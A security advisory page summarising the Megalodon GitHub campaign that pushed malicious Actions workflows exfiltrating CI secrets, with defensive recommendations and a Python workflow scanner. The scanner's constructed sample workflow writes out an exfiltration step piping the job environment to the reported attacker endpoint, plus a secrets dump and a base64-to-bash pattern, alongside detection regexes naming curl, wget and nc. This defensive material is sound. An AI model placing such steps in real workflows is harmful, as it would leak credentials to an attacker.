
Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Source: thehackernews.com | Published: 2026-05-22 | Category: AI supply chain | Severity: Critical

What Happened

Cybersecurity researchers have disclosed details of a new automated campaign called Megalodon that has pushed 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window. "Using throwaway accounts and forged author identities (build-bot, auto-ci, ci-bot, pipeline-bot), the attacker injected GitHub Actions workflows containing base64-encoded bash payloads that exfiltrate CI

Why It Matters

Researchers at SafeDep reported an automated campaign dubbed Megalodon that pushed 5,718 malicious commits into 5,561 public repositories within roughly six hours, using throwaway accounts, compromised GitHub credentials and forged CI bot author identities (build-bot, auto-ci, ci-bot, pipeline-bot).[1][2] Git author metadata is not authenticated unless commits are signed, so a bot-looking author name says nothing about who actually pushed the change; repositories that do not require verified signatures should treat these names as a hunting indicator, not as evidence of a trusted pipeline.

The attacker modified GitHub Actions workflows to embed base64-encoded bash payloads (the SysDiag and Optimize-Build variants) that executed inside CI/CD jobs and exfiltrated cloud credentials, SSH keys, OIDC tokens, and other sensitive environment data to attacker-controlled infrastructure at 216.126.225.129:8443.[1][2][4] A modified workflow is sufficient on its own: every step of a job can read the secrets and the GITHUB_TOKEN the job is granted, and a job with id-token: write can mint a GitHub OIDC token and exchange it for any cloud role that trusts the repository, so no further exploit is needed once the workflow runs. Reverting the commit does not invalidate what was already sent, which is why credential rotation is mandatory rather than optional.

From a CyberSE.AI perspective, this is a critical AI supply chain risk pattern: any AI or ML system that depends on these compromised repos or their CI artifacts could unknowingly incorporate tainted code or leaked credentials, undermining model integrity and operational security. Organizations should harden their software and AI supply chain by auditing GitHub Actions workflows, enforcing least-privilege tokens, rotating secrets, and establishing SBOM-driven provenance checks for all components feeding AI pipelines, which aligns with CyberSE.AI’s AI

Affected sectors: Healthcare, Fintech, SaaS, SMB, AI startups

CyberSE Analysis

This signal maps to AI supply chain. The specific control gap is CI/CD workflow tampering: a commit to .github/workflows changes what executes with access to the job's secrets and tokens, so any organization whose AI agents, LLM APIs, SaaS integrations, or training and deployment pipelines run in GitHub Actions should review whether this class of issue could create unauthorized tool execution, data leakage, weak approval gates, or unmanaged supply-chain exposure.

Recommended Actions

  • Audit every GitHub Actions workflow and recent commits to .github/workflows for unexpected changes, in particular commits authored as build-bot, auto-ci, ci-bot or pipeline-bot and steps that decode base64 into a shell; treat workflow edits as production code changes that require review.
  • Restrict the GITHUB_TOKEN to least privilege (a read-only permissions: block by default) and restrict AI agent tool permissions and production write paths the same way.
  • Rotate every credential that was available to a job that ran a tampered workflow: cloud keys, SSH keys, deploy tokens and SaaS integration secrets; where cloud roles trust the repository via OIDC, review and tighten those trust policies. Reverting the commit does not revoke what was already exfiltrated.
  • Block and alert on egress to 216.126.225.129:8443 from CI runners, and search CI logs for connections to it.
  • Review which secrets and sensitive data are exposed to CI jobs, agents, logs, embeddings, memory, and SaaS integrations, and remove what each job does not need.
  • Add human approval workflows (for example GitHub environment protection rules with required reviewers) for high-impact or state-changing actions.
  • Establish provenance checks for components feeding AI pipelines: pin actions and dependencies, and keep an SBOM for what each pipeline consumes.
  • Document the owner, control gap, and remediation deadline for this risk class.
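As a worked check for the workflow audit recommended above and for the mechanics described under Why It Matters (an added example written for this page, not SafeDep's or The Hacker News' tooling): a small Python scanner that flags the traits the write-up describes in a GitHub Actions workflow, namely base64 decoded into a shell inside a step, a bulk dump of secrets or of the job environment sent to the network, the reported endpoint 216.126.225.129:8443, and a job token granted write-all, plus a helper for the forged author names. The SAMPLE_WORKFLOW and CLEAN_WORKFLOW strings are constructed for illustration (the embedded base64 decodes to a harmless echo), and the finding names are this example's own.

```python
"""Static checks for GitHub Actions workflow text, modelled on the traits the
Megalodon write-up describes. Added example for this page; not SafeDep's tooling.
Feed the text of .github/workflows/*.yml to scan_workflow(), and git author
strings (git log --format='%an <%ae>') to is_forged_author()."""
import re
from typing import List, Tuple

# Attacker-controlled endpoint reported in the write-up.
IOC_HOSTS = {"216.126.225.129"}
# Forged git author names reported in the write-up.
FORGED_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}

# (finding name, regex applied to each workflow line). Names are this example's own.
RULES = [
    # echo <b64> | base64 -d | bash   or   $(echo <b64> | base64 -d)
    ("base64-decode-exec",
     re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z)?sh\b"
                r"|\$\(\s*(?:echo|printf)\b.*\|\s*base64\s+(?:-d|--decode)")),
    # Every repository secret expanded into one value, usually staged in env.
    ("secrets-dump", re.compile(r"toJSON\(\s*secrets\s*\)")),
    # Whole job environment piped straight into a network client.
    ("env-dump-to-network",
     re.compile(r"\b(?:env|printenv)\b.*\|\s*(?:curl|wget|nc)\b")),
    ("ioc-endpoint", re.compile("|".join(re.escape(h) for h in sorted(IOC_HOSTS)))),
    # GITHUB_TOKEN granted every scope; least privilege is a read-only default.
    ("token-write-all", re.compile(r"^\s*permissions:\s*write-all\s*$")),
]


def scan_workflow(text: str) -> List[Tuple[str, int, str]]:
    """Return (finding, line number, stripped line) for every matching line,
    plus a line-0 finding when the workflow never declares permissions: at all
    (the job then inherits the repository default, which may be write-all)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((name, lineno, line.strip()))
    if not re.search(r"^\s*permissions:", text, re.MULTILINE):
        findings.append(("no-permissions-block", 0,
                         "no permissions: key; GITHUB_TOKEN scope is the repository default"))
    return findings


def is_forged_author(author: str) -> bool:
    """True when a git author string such as 'build-bot <x@example.invalid>'
    uses one of the forged identities from the write-up. Author metadata is
    unsigned, so a match is a hunting lead, not proof of who pushed."""
    name = author.split("<", 1)[0].strip().lower()
    return name in FORGED_AUTHORS


# Constructed sample modelled on the described tampering. The base64 string is
# "echo hello"; the endpoint is the IOC from the write-up and is never contacted.
SAMPLE_WORKFLOW = """\
name: SysDiag
on: [push, pull_request]
permissions: write-all
jobs:
  diag:
    runs-on: ubuntu-latest
    env:
      ALL_SECRETS: ${{ toJSON(secrets) }}
    steps:
      - run: echo ZWNobyBoZWxsbw== | base64 -d | bash
      - run: env | curl -s -X POST --data-binary @- http://216.126.225.129:8443/
"""

# Constructed benign workflow with a read-only token for comparison.
CLEAN_WORKFLOW = """\
name: CI
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
"""

if __name__ == "__main__":
    for name, lineno, text in scan_workflow(SAMPLE_WORKFLOW):
        print(f"{name:22} line {lineno:2}: {text}")
    print("clean workflow findings:", scan_workflow(CLEAN_WORKFLOW))
    print("forged author?", is_forged_author("build-bot <build-bot@example.invalid>"))
```

The rules are deliberately line-based regexes rather than a YAML parse so the scanner runs with no dependencies on a runner or a laptop; a real audit would also diff each workflow against its last reviewed version, since the attacker's edits were committed changes rather than new files, and would correlate hits with the author check over git log.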

Source

https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html
